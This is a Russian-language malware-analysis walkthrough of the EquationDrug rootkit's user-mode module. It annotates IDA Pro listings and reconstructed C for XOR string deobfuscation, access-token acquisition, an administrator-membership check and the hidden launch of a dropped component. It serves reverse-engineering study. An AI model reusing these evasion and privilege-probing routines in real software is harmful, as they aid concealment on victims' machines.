Декомпилирование кода для исследования руткитов (EquationDrug, группа Equation): разбор листингов IDA Pro

Дизассемблирование с помощью IDA Pro

XOR в криптографии — это основа потоковых шифров и одноразового блокнота (шифртекст = открытый текст XOR гамма), а не способ генерации ключей в RSA, Эль-Гамале или эллиптической криптографии. В разбираемом ниже листинге это и вовсе не шифрование, а простейшая обфускация строки однобайтовым ключом, чтобы строка не была видна в файле при статическом анализе (см. habrahabr.ru/post/183462/).


XOR (exclusive OR) — результат равен 1, когда биты различаются:
0 0 0
0 1 1
1 0 1
1 1 0

Запомнить просто: «1, если биты разные». Главное свойство — обратимость: (x XOR k) XOR k = x, поэтому одна и та же функция с одним и тем же ключом и «зашифровывает», и «расшифровывает» строку.

Для чего нужен XOR в конструкции
Код:
movsx	ecx, byte ptr [eax]
xor	ecx, [ebp+arg_4]
movsx загружает в ecx один байт по адресу, который лежит в eax (eax здесь — указатель на текущий символ строки, a + i), и расширяет его по знаку до 32 бит.
xor ничего не «сравнивает»: он складывает этот байт по модулю 2 с ключом arg_4, то есть расшифровывает (или зашифровывает — операция та же) один символ. Дальше по листингу результат записывается обратно в строку: mov [edx], cl, где edx — тот же адрес a + i. Именно xor и этот store пропущены в псевдокоде ниже.


Об операции прыжка (перехода)
jmp - переход происходит всегда

Код:
mov eax, 6
mov ebx, 6
cmp eax, ebx
jge l2 ; taken when eax >= ebx as SIGNED values (6 >= 6 here, so taken); jae/jnb is the unsigned form -- mixing the two families is a classic bug
Код:
cmp eax, 0
jz l1 ; taken when eax == 0 (ZF set); `test eax, eax` is the usual shorter encoding of this zero check
если eax == 0 jz исполняется
Код:
cmp eax, 0
jnz l1 ; taken when eax != 0 (ZF clear); `test eax, eax` sets ZF the same way
если eax != 0 jnz исполняется
Декомпилированный код:
Код:
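/*
 * sub_401000 - XOR every byte of the NUL-terminated string a with the low
 * byte of b, in place.  Reconstructed from the IDA listing below: the loop
 * body is movsx ecx,[a+i] / xor ecx,b / mov [a+i],cl -- the xor and the
 * store are exactly what the earlier pseudocode left out.
 *
 * a: string to transform; modified in place, the terminator is untouched.
 * b: key; only its low byte affects the stored result.
 *
 * XOR is an involution, so calling this twice with the same key restores
 * the input.  The sample uses it to keep strings such as ".dll" out of the
 * binary (see sub_401810, key 0x7F via sub_401050).  The listing compares
 * the index with jge, i.e. as signed ints; for any realistic string length
 * that equals the size_t comparison used here.
 */
void sub_401000(char *a, int b)
{
    size_t len = strlen(a);
    size_t i;

    for (i = 0; i < len; i++)
        a[i] = (char)(a[i] ^ b);
}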


Листинг из IDA Pro:
Код:
/*
; Attributes: bp-based frame
; NOTE(review): in-place XOR of every byte of a NUL-terminated string with the
; low byte of the second argument:  for (i = 0; i < strlen(a); i++) a[i] ^= b;
; Callers on this page pass b = 0x7F (sub_401050) and 0x3C (sub_401070).
; XOR is its own inverse, so the same routine decodes strings hidden in the
; binary.  The author's pseudocode above dropped the xor and the store, which
; are the whole point of the loop.

; int __cdecl sub_401000(char *,int)
sub_401000 proc	near

var_8= dword ptr -8
var_4= dword ptr -4 // локальные переменные функции
; var_8 = loop index i, var_4 = strlen(arg_0)

arg_0= dword ptr  8 // аргументы вызова функции
arg_4= dword ptr  0Ch
; arg_0 = char *a (rewritten in place), arg_4 = int key

push	ebp 
mov	ebp, esp 
sub	esp, 8 

mov	eax, [ebp+arg_0]
push	eax		; char *
call	strlen
add	esp, 4
mov	[ebp+var_4], eax

//var_4 = strlen(arg_0);

mov	[ebp+var_8], 0

//var_8 = 0;

// цикл

jmp	short loc_401027

loc_40101E:
mov	ecx, [ebp+var_8]
add	ecx, 1
mov	[ebp+var_8], ecx

//var_8++;

loc_401027:
mov	edx, [ebp+var_8]
cmp	edx, [ebp+var_4]
; jge = signed compare: strlen's size_t is treated as int here
jge	short loc_401045

var_8 < var_4

mov	eax, [ebp+arg_0]
add	eax, [ebp+var_8]
; eax = &a[i]; the pointer in arg_0 itself is not changed (the gloss
; "arg_0 += var_8" below is misleading)

arg_0 += var_8;

movsx	ecx, byte ptr [eax]
; ecx = (int)a[i], sign-extended; only cl matters after the xor
xor	ecx, [ebp+arg_4]
; ecx ^= key -- the decode step, not a comparison

?

mov	edx, [ebp+arg_0]
add	edx, [ebp+var_8]
; edx = &a[i] again

arg0 += var_8;

mov	[edx], cl
; a[i] = (char)(a[i] ^ key): the decoded byte is stored back in place

?

jmp	short loc_40101E

//

for ( ; var_8 < var_4; var_8++)
{
arg_0 += var_8;

}


loc_401045:
mov	esp, ebp
pop	ebp

retn

return;

sub_401000 endp

align 10h
*/

Динамическое получение адресов системных функций (примерно).
Руткит (EquationDrug, группа Equation) получает адрес RtlImageDirectoryEntryToData — это экспорт ntdll.dll (функция для разбора каталогов данных PE-образа, например таблицы экспорта), а не функция ядра — примерно следующим образом. Разрешение API через GetProcAddress вместо таблицы импорта скрывает используемые функции от статического анализа; RtlImageDirectoryEntryToData сам часто применяется для ручного разбора экспортов других модулей.

Код:
hLibModule = LoadLibraryA("ntdll.dll");  /* ntdll is already mapped in every process; this only bumps its reference count */
typedef PVOID (*PROC1)(PVOID, BOOLEAN, USHORT, PULONG);  /* RtlImageDirectoryEntryToData(Base, MappedAsImage, DirectoryEntry, &Size) */
PROC1 proc = (PROC1) GetProcAddress(hLibModule, "RtlImageDirectoryEntryToData");
FreeLibrary(hLibModule);  /* NOTE(review): safe only because ntdll never unloads; for any other module `proc` would dangle after this call */

Получение токена (EquationDrug группа Equation)

Код:
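/*
 * sub_402330 - obtain an access token for the calling thread/process.
 * Reconstructed from the IDA listing below.
 *
 * dwDesiredAccess    access mask for OpenThreadToken / OpenProcessToken
 *                    (and for the duplicate).
 * a                  the listing's arg_4: non-zero means "I need an
 *                    impersonation token" -- the process token is then opened
 *                    for TOKEN_DUPLICATE (2) only and an impersonation-type
 *                    copy is returned instead of the primary token.
 * ImpersonationLevel level passed to DuplicateTokenEx.
 *
 * Returns the token handle, or NULL on failure (loc_402458 path).
 * The thread token is tried first with OpenAsSelf = TRUE; only
 * ERROR_NO_TOKEN (0x3F0, thread not impersonating) falls back to the process
 * token -- any other error returns NULL.  sub_4021B0 calls this as
 * sub_402330(TOKEN_QUERY, 1, SecurityIdentification) because AccessCheck
 * refuses primary tokens.
 *
 * The listing wraps the body in an MSVC SEH frame (fs:0 / sub_407BC0); the
 * var_4 / var_18 / var_10 writes and the author's printf are not part of
 * the program logic and are omitted here.
 */
HANDLE sub_402330(DWORD dwDesiredAccess, int a, SECURITY_IMPERSONATION_LEVEL ImpersonationLevel)
{
    HANDLE hObject = 0;
    HANDLE phNewToken = 0;
    DWORD var_2C;

    if (OpenThreadToken(GetCurrentThread(), dwDesiredAccess, 1, &hObject))
        return hObject;                               /* loc_402394 not taken */

    if (GetLastError() != 0x3F0)                      /* ERROR_NO_TOKEN */
        return 0;                                     /* loc_40243F -> loc_402458 */

    var_2C = (a != 0) ? 2 : dwDesiredAccess;          /* 2 == TOKEN_DUPLICATE */
    if (!OpenProcessToken(GetCurrentProcess(), var_2C, &hObject))
        return 0;

    if (a == 0)
        return hObject;                               /* loc_40242D: primary token as-is */

    /* TokenType 2 == TokenImpersonation. */
    if (!DuplicateTokenEx(hObject, dwDesiredAccess, 0, ImpersonationLevel,
                          (TOKEN_TYPE)2, &phNewToken))
        phNewToken = 0;

    if (hObject != 0) {                               /* loc_402404 */
        CloseHandle(hObject);
        hObject = 0;
    }
    return phNewToken;                                /* loc_40241B */
}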
Код:

/*

; Attributes: bp-based frame
; NOTE(review): the prologue below sets up an MSVC SEH frame (push -1 /
; scope table unk_409278 / handler sub_407BC0 / fs:0 link).  var_4 is the
; __try level, var_18 the saved esp and var_10 the previous fs:0 -- compiler
; bookkeeping, not program state; the "var_4 = 0xFFFFFFFF" lines in the
; author's pseudocode merely leave the __try block.
; What the function does: return the thread's impersonation token if there
; is one; on ERROR_NO_TOKEN fall back to the process token and, if arg_4 != 0,
; return an impersonation-type duplicate of it (AccessCheck in sub_4021B0
; needs that).  eax = token handle, or 0 on failure.

; int __cdecl sub_402330(DWORD dwDesiredAccess,int,SECURITY_IMPERSONATION_LEVEL	ImpersonationLevel)
sub_402330 proc	near

var_34=	dword ptr -34h
var_30=	dword ptr -30h
var_2C=	dword ptr -2Ch
var_28=	dword ptr -28h
phNewToken= dword ptr -24h
var_20=	dword ptr -20h
hObject= dword ptr -1Ch
var_18=	dword ptr -18h
var_10=	dword ptr -10h
var_4= dword ptr -4
dwDesiredAccess= dword ptr  8
arg_4= dword ptr  0Ch
ImpersonationLevel= dword ptr  10h
; var_28 / var_30 / var_34 are only staging copies of the value returned in eax

push	ebp
mov	ebp, esp
push	0FFFFFFFFh
push	offset unk_409278
push	offset sub_407BC0
mov	eax, large fs:0
push	eax
mov	large fs:0, esp
add	esp, 0FFFFFFDCh
push	ebx
push	esi
push	edi
mov	[ebp+var_18], esp
mov	[ebp+var_4], 0
mov	[ebp+hObject], 0
; NOTE(review): the three gloss lines below are the author's; var_18 is set
; to esp (not 0) and var_4 = 0 means "inside __try".

var_18=0;
var_4=0;
hObject=0;

lea	eax, [ebp+hObject]
push	eax		; TokenHandle
push	1		; OpenAsSelf
; OpenAsSelf = TRUE: the open is checked against the process' own token,
; so a thread impersonating a weaker client can still open its token
mov	ecx, [ebp+dwDesiredAccess]
push	ecx		; DesiredAccess
call	ds:GetCurrentThread
push	eax		; ThreadHandle
call	ds:OpenThreadToken ; Open the access token associated with a thread

if (!OpenThreadToken(GetCurrentThread(), dwDesiredAccess, 1, &hObject))
{
jz	short loc_402394
}
else
{
var_28=hObject;
var_4= 0xFFFFFFFF;
}

test	eax, eax
jz	short loc_402394
; success: hand back the thread token unchanged
mov	edx, [ebp+hObject]
mov	[ebp+var_28], edx
mov	[ebp+var_4], 0FFFFFFFFh
mov	eax, [ebp+var_28]
jmp	loc_40245A

loc_402394:
call	ds:GetLastError
cmp	eax, 3F0h
; 3F0h = ERROR_NO_TOKEN (thread is not impersonating).  Any other error
; goes to loc_40243F and returns 0.
jnz	loc_40243F

cmp	[ebp+arg_4], 0
jz	short loc_4023B4
mov	[ebp+var_2C], 2
; arg_4 != 0: open the process token for TOKEN_DUPLICATE (2) only
jmp	short loc_4023BA

loc_4023B4:
mov	eax, [ebp+dwDesiredAccess]
mov	[ebp+var_2C], eax
; arg_4 == 0: open it with the caller's own access mask

loc_4023BA:
mov	ecx, [ebp+var_2C]
mov	[ebp+var_20], ecx
lea	edx, [ebp+hObject]
push	edx		; TokenHandle
mov	eax, [ebp+var_20]
push	eax		; DesiredAccess
call	ds:GetCurrentProcess
push	eax		; ProcessHandle
call	ds:OpenProcessToken ; Open the access token associated with a process

OpenProcessToken(GetCurrentProcess(), DesiredAccess, &hObject);


test	eax, eax
jz	short loc_40243F
cmp	[ebp+arg_4], 0
jz	short loc_40242D
; arg_4 != 0: derive an impersonation token from the primary one
lea	ecx, [ebp+phNewToken]
push	ecx		; phNewToken
push	2		; TokenType
; TokenType 2 = TokenImpersonation (1 would be TokenPrimary)
mov	edx, [ebp+ImpersonationLevel]
push	edx		; ImpersonationLevel
push	0		; lpTokenAttributes
mov	eax, [ebp+dwDesiredAccess]
push	eax		; dwDesiredAccess
mov	ecx, [ebp+hObject]
push	ecx		; hExistingToken
call	ds:DuplicateTokenEx

DuplicateTokenEx(hObject, dwDesiredAccess, 0, ImpersonationLevel, 2 , &phNewToken);

test	eax, eax
jnz	short loc_402404
mov	[ebp+phNewToken], 0
; duplication failed: the result becomes 0, the primary token is still closed

loc_402404:
cmp	[ebp+hObject], 0
jz	short loc_40241B
mov	edx, [ebp+hObject]
push	edx		; hObject
call	ds:CloseHandle
mov	[ebp+hObject], 0

CloseHandle(hObject);
hObject=0;

loc_40241B:
mov	eax, [ebp+phNewToken]
mov	[ebp+var_30], eax
mov	[ebp+var_4], 0FFFFFFFFh
mov	eax, [ebp+var_30]
jmp	short loc_40245A

var_30=phNewToken;
var_4= 0xFFFFFFFF;


loc_40242D:
; arg_4 == 0: return the process token itself
mov	ecx, [ebp+hObject]
mov	[ebp+var_34], ecx
mov	[ebp+var_4], 0FFFFFFFFh
mov	eax, [ebp+var_34]
jmp	short loc_40245A

loc_40243F:
mov	[ebp+var_4], 0FFFFFFFFh
jmp	short loc_402458
; The four instructions after this jmp are never reached by fall-through.
; They look like the __except filter (returns 1 = EXCEPTION_EXECUTE_HANDLER)
; and the handler body that restores esp from var_18 -- entered only by the
; exception dispatcher through sub_407BC0.  Confirm against the scope table.
mov	eax, 1
retn
mov	esp, [ebp-18h]
mov	dword ptr [ebp-4], 0FFFFFFFFh

loc_402458:
xor	eax, eax
; failure: return NULL

loc_40245A:
mov	ecx, [ebp+var_10]
mov	large fs:0, ecx
; unlink the SEH frame, restore callee-saved registers, return eax
pop	edi
pop	esi
pop	ebx
mov	esp, ebp
pop	ebp
retn
sub_402330 endp

align 10h

Проверка членства токена в группе (EquationDrug, группа Equation). Функция строит дескриптор безопасности, в DACL которого единственная разрешающая ACE для pSid, и вызывает AccessCheck: доступ будет разрешён только если pSid есть в токене — это старый способ проверить членство в группе (до появления CheckTokenMembership). Вызывающая функция sub_401920 передаёт SID группы BUILTIN\Administrators (S-1-5-32-544).
Время действия — с 2003 года; руткит режима ядра (приведённый здесь код — его пользовательский модуль, ядерная часть в листингах не показана).

Код:
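/*
 * sub_4021B0 - is pSid present (and enabled) in ClientToken?
 *
 * AccessCheck is used as a membership oracle, the pre-CheckTokenMembership
 * idiom: a throw-away security descriptor gets a DACL with a single
 * access-allowed ACE granting bit 1 to pSid, then AccessCheck asks for
 * bit 1.  It is granted only if the token contains pSid, so *AccessStatus
 * is TRUE exactly when the token is a member of pSid.  The caller
 * (sub_401920) passes BUILTIN\Administrators.
 *
 * ClientToken   impersonation token; if NULL, sub_402330(8 = TOKEN_QUERY,
 *               1 = want an impersonation copy, 1 = SecurityIdentification)
 *               provides one -- AccessCheck rejects primary tokens.  The
 *               token obtained that way is never closed in the listing.
 * pSid          SID to look for.
 * AccessStatus  receives AccessCheck's yes/no.
 * Returns AccessCheck's BOOL (var_1C), or 0 when no token could be obtained.
 *
 * __stdcall in the listing (retn 0Ch).  The SEH frame (var_4/var_18/var_10)
 * is omitted.  The author's version had GenericAll = 0 instead of 1,
 * dropped InitializeSecurityDescriptor and the NULL-token branch, and added
 * printf calls that are not in the binary.
 */
DWORD sub_4021B0(HANDLE ClientToken, PSID pSid, LPBOOL AccessStatus)
{
    DWORD var_B0[0x54 / 4 + 1];              /* backing store for the 0x54-byte ACL */
    PACL pDacl;
    DWORD PrivilegeSetLength;
    GENERIC_MAPPING GenericMapping;
    _PRIVILEGE_SET PrivilegeSet;
    SECURITY_DESCRIPTOR pSecurityDescriptor;
    SID pGroup;                              /* hand-built S-1-1-0 (Everyone) */
    DWORD GrantedAccess;
    DWORD var_1C = 0;

    if (ClientToken == 0)
        ClientToken = sub_402330(8, 1, (SECURITY_IMPERSONATION_LEVEL)1);
    if (ClientToken == 0)
        return 0;                            /* loc_4021FE: no token, no check */

    pDacl = (PACL)var_B0;
    InitializeAcl(pDacl, 0x54, 2);           /* 2 == ACL_REVISION */
    AddAccessAllowedAce(pDacl, 2, 1, pSid);  /* the only ACE: allow bit 1 to pSid */

    InitializeSecurityDescriptor(&pSecurityDescriptor, 1);  /* SECURITY_DESCRIPTOR_REVISION */

    /* Byte stores at [ebp-58h..-50h] in the listing: Revision 1,
       SubAuthorityCount 1, IdentifierAuthority {0,0,0,0,0,1} (WORLD),
       SubAuthority[0] = 0  ->  S-1-1-0.  Used only as owner and group;
       it does not affect the membership result. */
    pGroup.Revision = 1;
    pGroup.SubAuthorityCount = 1;
    pGroup.IdentifierAuthority.Value[0] = 0;
    pGroup.IdentifierAuthority.Value[1] = 0;
    pGroup.IdentifierAuthority.Value[2] = 0;
    pGroup.IdentifierAuthority.Value[3] = 0;
    pGroup.IdentifierAuthority.Value[4] = 0;
    pGroup.IdentifierAuthority.Value[5] = 1;
    pGroup.SubAuthority[0] = 0;

    SetSecurityDescriptorOwner(&pSecurityDescriptor, &pGroup, 0);
    SetSecurityDescriptorGroup(&pSecurityDescriptor, &pGroup, 0);
    SetSecurityDescriptorDacl(&pSecurityDescriptor, 1, pDacl, 0);

    GenericMapping.GenericRead = 0;
    GenericMapping.GenericWrite = 0;
    GenericMapping.GenericExecute = 0;
    GenericMapping.GenericAll = 1;           /* listing stores 1 here, not 0 */
    PrivilegeSetLength = 0x14;               /* sizeof(PRIVILEGE_SET) on x86 */

    /* DesiredAccess 1 is the bit the ACE grants to pSid alone. */
    var_1C = AccessCheck(&pSecurityDescriptor, ClientToken, 1, &GenericMapping,
                         &PrivilegeSet, &PrivilegeSetLength, &GrantedAccess,
                         AccessStatus);
    return var_1C;
}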
Код:

/*
; int __stdcall	sub_4021B0(HANDLE ClientToken,PSID pSid,LPBOOL AccessStatus)
; NOTE(review): membership test via AccessCheck.  A DACL with one ACE that
; grants access bit 1 to pSid is attached to a scratch security descriptor;
; AccessCheck for bit 1 then succeeds only if the token holds pSid.  The
; caller passes BUILTIN\Administrators.  SEH frame as in sub_402330
; (var_4 / var_18 / var_10).  eax = AccessCheck result (var_1C), 0 if no
; token could be obtained; stdcall (retn 0Ch).
sub_4021B0 proc	near

PrivilegeSetLength= dword ptr -0C4h
GenericMapping=	GENERIC_MAPPING	ptr -0C0h
var_B0=	dword ptr -0B0h
; var_B0: 0x54-byte buffer that becomes the ACL
pGroup=	byte ptr -58h
var_55=	byte ptr -55h
var_54=	byte ptr -54h
var_53=	byte ptr -53h
var_52=	byte ptr -52h
var_51=	byte ptr -51h
var_50=	dword ptr -50h
; pGroup..var_50 together form one 12-byte SID built by hand below
pDacl= dword ptr -4Ch
pSecurityDescriptor= dword ptr -48h
PrivilegeSet= _PRIVILEGE_SET ptr -34h
GrantedAccess= dword ptr -20h
var_1C=	dword ptr -1Ch
var_18=	dword ptr -18h
var_10=	dword ptr -10h
var_4= dword ptr -4
ClientToken= dword ptr	8
pSid= dword ptr	 0Ch
AccessStatus= dword ptr	 10h

push	ebp
mov	ebp, esp
push	0FFFFFFFFh
push	offset unk_409268
push	offset sub_407BC0
mov	eax, large fs:0
push	eax
mov	large fs:0, esp
add	esp, 0FFFFFF4Ch
push	ebx
push	esi
push	edi
mov	[ebp+var_18], esp
mov	[ebp+var_1C], 0
mov	[ebp+var_4], 0
cmp	[ebp+ClientToken], 0
jnz	short loc_4021FE
; no token supplied: fetch an impersonation token with TOKEN_QUERY (8) at
; SecurityIdentification (1) -- AccessCheck refuses primary tokens
push	1		; ImpersonationLevel
push	1		; int
push	8		; dwDesiredAccess
call	sub_402330
add	esp, 0Ch
mov	[ebp+ClientToken], eax

sub_402330(8, 1, 1);

loc_4021FE:
cmp	[ebp+ClientToken], 0
jnz	short loc_402210
mov	[ebp+var_1C], 0
; still no token: return 0 (branch missing from the author's pseudocode)
jmp	loc_4022FD

loc_402210:
lea	eax, [ebp+var_B0]
mov	[ebp+pDacl], eax
push	2		; dwAclRevision
push	54h		; nAclLength
mov	ecx, [ebp+pDacl]
push	ecx		; pAcl
call	ds:InitializeAcl

pDacl = &var_B0;
InitializeAcl(pDacl, 0x54, 2);

mov	edx, [ebp+pSid]
push	edx		; pSid
push	1		; AccessMask
; the only ACE: allow access bit 1 to pSid
push	2		; dwAceRevision
mov	eax, [ebp+pDacl]
push	eax		; pAcl
call	ds:AddAccessAllowedAce

AddAccessAllowedAce(pDacl, 2, 1, pSid); 

push	1		; dwRevision
lea	ecx, [ebp+pSecurityDescriptor]
push	ecx		; pSecurityDescriptor
call	ds:InitializeSecurityDescriptor
; (this call is missing from the author's pseudocode)
mov	[ebp+pGroup], 1
mov	byte ptr [ebp-57h], 1
mov	byte ptr [ebp-56h], 0
mov	[ebp+var_55], 0
mov	[ebp+var_54], 0
mov	[ebp+var_53], 0
mov	[ebp+var_52], 0
mov	[ebp+var_51], 1
mov	[ebp+var_50], 0
; Revision 1, SubAuthorityCount 1, IdentifierAuthority {0,0,0,0,0,1}
; (SECURITY_WORLD_SID_AUTHORITY), SubAuthority[0] = 0  ->  S-1-1-0, Everyone.
; Only used as the descriptor's owner/group; it does not affect the check.
push	0		; bOwnerDefaulted
lea	edx, [ebp+pGroup]
push	edx		; pOwner
lea	eax, [ebp+pSecurityDescriptor]
push	eax		; pSecurityDescriptor
call	ds:SetSecurityDescriptorOwner

SetSecurityDescriptorOwner(&pSecurityDescriptor, &pGroup, 0);

push	0		; bGroupDefaulted
lea	ecx, [ebp+pGroup]
push	ecx		; pGroup
lea	edx, [ebp+pSecurityDescriptor]
push	edx		; pSecurityDescriptor
call	ds:SetSecurityDescriptorGroup

SetSecurityDescriptorGroup(&pSecurityDescriptor, &pGroup, 0);

push	0		; bDaclDefaulted
mov	eax, [ebp+pDacl]
push	eax		; pDacl
push	1		; bDaclPresent
lea	ecx, [ebp+pSecurityDescriptor]
push	ecx		; pSecurityDescriptor
call	ds:SetSecurityDescriptorDacl

SetSecurityDescriptorDacl(&pSecurityDescriptor, 1, pDacl, 0);

mov	[ebp+GenericMapping.GenericRead], 0
mov	[ebp+GenericMapping.GenericWrite], 0
mov	[ebp+GenericMapping.GenericExecute], 0
mov	[ebp+GenericMapping.GenericAll], 1
; GenericAll = 1 here; the author's pseudocode says 0
mov	[ebp+PrivilegeSetLength], 14h
; 14h = sizeof(PRIVILEGE_SET) on x86


mov	edx, [ebp+AccessStatus]
push	edx		; AccessStatus
lea	eax, [ebp+GrantedAccess]
push	eax		; GrantedAccess
lea	ecx, [ebp+PrivilegeSetLength]
push	ecx		; PrivilegeSetLength
lea	edx, [ebp+PrivilegeSet]
push	edx		; PrivilegeSet
lea	eax, [ebp+GenericMapping]
push	eax		; GenericMapping
push	1		; DesiredAccess
; ask for exactly the bit the ACE grants: granted <=> token contains pSid
mov	ecx, [ebp+ClientToken]
push	ecx		; ClientToken
lea	edx, [ebp+pSecurityDescriptor]
push	edx		; pSecurityDescriptor
call	ds:AccessCheck	; Check	a client's access to an object
mov	[ebp+var_1C], eax

loc_4022FD:
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_402316
; next four instructions: __except filter / handler funclets, not reached
; by fall-through (same layout as in sub_402330)
mov eax, 1
retn
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh

loc_402316:
mov eax, [ebp+var_1C]
; return value = AccessCheck's result (0 if no token)
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; stdcall: callee pops the three arguments
sub_4021B0 endp

align 10h

*/

Проверка, входит ли текущий токен в группу BUILTIN\Administrators (EquationDrug, группа Equation). Версия ОС здесь лишь ветвит логику: на Win9x (dwPlatformId == 1) модели безопасности нет и результат сразу 1; на NT 4 (dwPlatformId == 2 и dwMajorVersion == 4) проверка пропускается и результат 0; иначе строится SID S-1-5-32-544 (authority 5 = NT, 0x20 = BUILTIN, 0x220 = 544 = Administrators) и вызывается sub_4021B0.


Код:
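/*
 * sub_401920 - is the caller a member of BUILTIN\Administrators?
 *
 * Reconstructed from the listing below; the author's version had the
 * authority byte (0 instead of 5), the NT4 test (">= 4" instead of "== 4")
 * and the pSid argument (&pSid instead of pSid) wrong:
 *   - Win9x  (dwPlatformId == 1): no security model, result 1.
 *   - NT 4   (dwPlatformId == 2 && dwMajorVersion == 4): result 0, no check.
 *   - otherwise: build S-1-5-32-544 (SECURITY_NT_AUTHORITY {0,0,0,0,0,5},
 *     SECURITY_BUILTIN_DOMAIN_RID 0x20, DOMAIN_ALIAS_RID_ADMINS 0x220) and
 *     ask sub_4021B0 whether the current token contains it.
 *
 * AccessStatus doubles as AllocateAndInitializeSid's result and as the
 * out-parameter of sub_4021B0.  The epilogue is a function chunk at
 * 00401A50 that is not on this page; the caller (sub_401CA0) tests eax,
 * so AccessStatus is assumed to be the return value -- confirm.  The
 * common exit calls sub_401A38 (its listing is not shown; the author's
 * stub suggests it frees a still-allocated pSid).  var_18/var_10/var_4 in
 * the listing belong to the SEH frame and are omitted.
 */
DWORD sub_401920(void)
{
    _OSVERSIONINFOA VersionInformation;
    _SID_IDENTIFIER_AUTHORITY pIdentifierAuthority;
    DWORD AccessStatus = 0;
    PSID pSid = 0;
    int i;

    for (i = 0; i < 5; i++)
        pIdentifierAuthority.Value[i] = 0;
    pIdentifierAuthority.Value[5] = 5;             /* SECURITY_NT_AUTHORITY */

    VersionInformation.dwOSVersionInfoSize = 0x94; /* sizeof(OSVERSIONINFOA) */
    if (!GetVersionExA(&VersionInformation))
        return 0;

    if (VersionInformation.dwPlatformId == 1)      /* VER_PLATFORM_WIN32_WINDOWS */
        return 1;
    if (VersionInformation.dwPlatformId == 2 &&    /* VER_PLATFORM_WIN32_NT */
        VersionInformation.dwMajorVersion == 4)    /* listing: jnz on == 4 */
        return 0;

    AccessStatus = AllocateAndInitializeSid(&pIdentifierAuthority, 2, 0x20, 0x220,
                                            0, 0, 0, 0, 0, 0, &pSid);
    if (AccessStatus == 0)
        return 0;

    /* pSid is already a PSID and is passed by value; ClientToken 0 makes
       sub_4021B0 obtain an impersonation token itself. */
    if (!sub_4021B0(0, pSid, (LPBOOL)&AccessStatus)) {
        AccessStatus = 0;                          /* pSid left for sub_401A38 */
    } else {
        FreeSid(pSid);                             /* loc_401A19 */
        pSid = 0;
    }
    return AccessStatus;
}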
Код:
/*
sub_401920 proc	near
; NOTE(review): "is the current token a member of BUILTIN\Administrators?"
; Win9x -> 1 without checking, NT 4 -> 0 without checking, otherwise builds
; S-1-5-32-544 and calls sub_4021B0.  SEH frame as in sub_402330.  The return
; path is the chunk at 00401A50 (not shown); sub_401CA0 tests eax afterwards,
; so AccessStatus is presumably the return value -- confirm.

VersionInformation= _OSVERSIONINFOA ptr	-0C0h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY	ptr -28h
AccessStatus= dword ptr	-20h
pSid= dword ptr	-1Ch
var_18=	dword ptr -18h
var_10=	dword ptr -10h
var_4= dword ptr -4

; FUNCTION CHUNK AT 00401A50 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00401A69 SIZE 00000014 BYTES

push	ebp
mov	ebp, esp
push	0FFFFFFFFh
push	offset unk_4091F8
push	offset sub_407BC0
mov	eax, large fs:0
push	eax
mov	large fs:0, esp
add	esp, 0FFFFFF50h
push	ebx
push	esi
push	edi
mov	[ebp+var_18], esp
mov	[ebp+AccessStatus], 0
mov	[ebp+pIdentifierAuthority.Value], 0
mov	[ebp+pIdentifierAuthority.Value+1], 0
mov	[ebp+pIdentifierAuthority.Value+2], 0
mov	[ebp+pIdentifierAuthority.Value+3], 0
mov	[ebp+pIdentifierAuthority.Value+4], 0
mov	[ebp+pIdentifierAuthority.Value+5], 5
; {0,0,0,0,0,5} = SECURITY_NT_AUTHORITY (the author's pseudocode has 0 here)
mov	[ebp+pSid], 0
mov	[ebp+var_4], 0
mov	[ebp+var_4], 1
mov	[ebp+VersionInformation.dwOSVersionInfoSize], 94h
lea	eax, [ebp+VersionInformation]
push	eax		; lpVersionInformation
call	ds:GetVersionExA ; Get extended	information about the
			; version of the operating system
test	eax, eax
jnz	short loc_4019A4
mov	[ebp+AccessStatus], 0
jmp	loc_401A2A

loc_4019A4:
cmp	[ebp+VersionInformation.dwPlatformId], 1
jnz	short loc_4019B6
mov	[ebp+AccessStatus], 1
; VER_PLATFORM_WIN32_WINDOWS: no security model, treated as "admin"
jmp	short loc_401A2A

loc_4019B6:
cmp	[ebp+VersionInformation.dwPlatformId], 2
jnz	short loc_4019D1
cmp	[ebp+VersionInformation.dwMajorVersion], 4
jnz	short loc_4019D1
mov	[ebp+AccessStatus], 0
; NT exactly 4.x: result 0, no check (the pseudocode's ">= 4" is wrong)
jmp	short loc_401A2A

loc_4019D1:
lea	ecx, [ebp+pSid]
push	ecx		; pSid
push	0		; nSubAuthority7
push	0		; nSubAuthority6
push	0		; nSubAuthority5
push	0		; nSubAuthority4
push	0		; nSubAuthority3
push	0		; nSubAuthority2
push	220h		; nSubAuthority1
push	20h		; nSubAuthority0
; 20h = SECURITY_BUILTIN_DOMAIN_RID, 220h = DOMAIN_ALIAS_RID_ADMINS (544):
; S-1-5-32-544, BUILTIN\Administrators
push	2		; nSubAuthorityCount
lea	edx, [ebp+pIdentifierAuthority]
push	edx		; pIdentifierAuthority
call	ds:AllocateAndInitializeSid ; Allocate and initializes a security
			; identifier with up to	eight subauthorities
mov	[ebp+AccessStatus], eax
cmp	[ebp+AccessStatus], 0
jz	short loc_401A2A
lea	eax, [ebp+AccessStatus]
push	eax		; AccessStatus
mov	ecx, [ebp+pSid]
push	ecx		; pSid
; pSid is pushed by value, not as &pSid
push	0		; ClientToken
; ClientToken 0: sub_4021B0 obtains an impersonation token itself
call	sub_4021B0
test	eax, eax
jnz	short loc_401A19
mov	[ebp+AccessStatus], 0
; sub_4021B0 failed: result 0 and pSid is NOT freed here (only in the
; cleanup chunk, if sub_401A38 does what the author's stub suggests)
jmp	short loc_401A2A

loc_401A19:
mov	edx, [ebp+pSid]
push	edx		; pSid
call	ds:FreeSid
mov	[ebp+pSid], 0

loc_401A2A:
mov	[ebp+var_4], 0
call	sub_401A38
jmp	short loc_401A50
; loc_401A50 is the epilogue chunk (not on this page)
sub_401920 endp
*/

Запуск сброшенного компонента (EquationDrug). Байты {0x51, 0x1B, 0x13, 0x13} после XOR с 0x7F (sub_401050 → sub_401000) дают строку ".dll", которая существует только в памяти. Если имя содержит ".dll", компонент загружается в текущий процесс через LoadLibraryA (т.е. выполняется его DllMain); иначе он запускается как отдельный процесс со скрытым окном (STARTF_USESHOWWINDOW, SW_HIDE) и наследованием дескрипторов. lpApplicationName — единственный аргумент функции, а не буфер из new[], как в псевдокоде автора.

Код:
